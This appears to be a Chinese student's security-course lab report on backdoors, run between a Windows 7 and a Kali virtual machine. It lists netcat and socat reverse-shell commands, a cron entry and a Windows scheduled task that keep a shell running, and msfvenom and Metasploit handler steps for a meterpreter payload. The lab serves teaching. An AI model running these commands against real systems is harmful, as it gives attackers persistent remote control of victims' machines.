zoukankan      html  css  js  c++  java
  • Exp2 后门原理与实践

    Exp2 后门原理与实践


    实验环境:win7-64bit kali-64bit


    基础问题

    1. 例举你能想到的一个后门进入到你系统中的可能方式?
      下载破解版游戏的时候,有些后门会被发现被杀毒软件提醒阻止。但是有些可能未被发现,就顺利进入到我的系统中。

    2.例举你知道的后门如何启动起来(win及linux)的方式?
    伪装成系统文件自启动。
    通过win的任务计划或linux的cron定时开启
    通过运行相关脚本或软件触发

    3.Meterpreter有哪些给你映像深刻的功能?
    可以记录键盘和抓取屏幕,如果系统定时抓取屏幕,并记录键盘信息,可以很容易就分析得到我的密码

    4.如何发现自己有系统有没有被安装后门?
    使用杀毒软件。
    查看端口,看是否有异常操作。


    实践

    预备任务

    1. 在Windows中需要载ncat.rar,解压后即可使用

    2. 利用命令行进入刚刚解压ncat的目录。

    3. 利用 ncat.exe -l -p 5329 命令打开端口号为5329的端口

    4. 利用nc 192.168.247.138 5329 -e /bin/sh 在Linux反弹连接windows。

    linux获得window shell

    1. Linux获得Windows Shell的过程同理,在Linux运行监听指令:nc -l -p 5329 打开端口

    2. 利用ncat.exe -e cmd.exe 192.168.247.138 指令Windows反弹连接Linux

    任务一:使用netcat获取主机操作Shell,cron启动

    1. 首先在Windows中下载scat,解压

    2. 使用crontab -e命令编辑配置文件,在最后一行或第一行添加指令35 * * * * /bin/netcat 192.168.247.138 5329 -e /bin/sh

    任务二:使用socat获取主机操作Shell, 任务计划启动

    1. 在windows中,右键单击计算机,打开管理->系统工具->任务计划程序,单击创建基本任务,填写任务名称,设置触发器为当前用户登录时,设置操作为启动程序,选择启动程序为socat.exe,参数设置为tcp-listen:5329 exec:cmd.exe,pty,stderr
    2. 作用是把cmd绑定到端口5329,同时把cmd的Stderr复位向到stdout

    任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    1. 在kali中利用如下命令创建一个名为5329的后门程序
    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.138 LPORT=5329 -f exe > 20155329.exe
    1. 2.将其通过ncat,传送到主机,在Windows中使用命令ncat.exe -l 5329 > 20155329.exe,在Kali中使用命令:nc 192.168.247.137 5329 < 20155329.exe,这样就传送过来了。
    2. MSF打开监听,输入如下指令
    • msfconsole
    • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • set LHOST 192.168.247.137
    • set LPORT 5329
    • show options
    • exploit
    1. 在win7打开生成5329.exe的程序,回到kali,终端提示
    2. 尝试使用命令dir,成功显示windows中的文件夹

    任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权


    实验感想:

    • 实验整体不难,虽然过程中被大佬狠狠的鄙视了一把。但是做成功了还是很开心,在这次实验中遇见的问题还是有的,比如说虚拟机黑屏一直打不开,电脑系统复位后才能正常使用等,最后成功之后一直忘记写实验报告等,在实验过程中突然觉得电脑这东西好不安全,以后看样子得把摄像头麦克风等设备不需要时,物理的去让他关闭。确保安全,以防发生帅照被流出的严重后果。以后在网上下载东西 点开网页时得注意了,多留心
  • 相关阅读:
    使用JavaScript获取select元素选中的value和text
    EF应用一:Code First模式
    EF常用查询语句
    在EF中执行SQL语句
    c++学习笔记之继承篇
    pyqt系列原创入门教程
    python sorted排序用法详解
    常见排序算法-Python实现
    作品集
    deepin系统如何安装deb格式的软件
  • 原文地址:https://www.cnblogs.com/hpl20155329/p/8698634.html
Copyright © 2011-2022 走看看